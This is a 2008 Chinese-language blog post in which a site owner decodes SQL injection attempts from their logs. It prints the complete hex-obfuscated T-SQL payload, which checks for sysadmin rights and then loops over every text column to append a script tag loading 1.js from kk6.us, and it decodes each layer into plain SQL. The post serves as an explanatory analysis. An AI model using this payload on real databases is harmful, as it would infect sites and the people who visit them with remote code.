解码网站SQL注入代码
时间:2008/6/1 0:23:12
阅读:8580
上次在QQ空间中说到SQL注入方法用HEX可绕过一般的IDS,果然这几天网站记录了此类非法扫描记录,还好俺的网站事先有准备,来看一下这些鸟人都干了些什么,找几个记录:
提交参数:1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
解码一下这个:0x730079007300610064006D0069006E00
内容:sysadmin
这很明白,首先判断是否是sysadmin权限,下来就到这个:
提交参数:1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--
再解码一下内容变成了:dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
看来还是有点乱,再把上面的转换成小写:declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor
好了,经过解码基本能看明白了,简单解释一下,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入代码:</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>
其中(%6b%6b%36%2e%75%73)这段也是经过URL编码的,解码一下变成了:kk6.us
也就是在数据库列中插入代码:</title><script src=http://kk6.us/1.js></script>
好了,只要你的网页从数据库中读取带有此代码的列,便会出现错误,也就是会从kk6.us中读取1.js文件,只要你访问,嘿嘿,你完了……
简单介绍了一下最近注行的注入方法,有什么说得不对的请各位高手多多批评。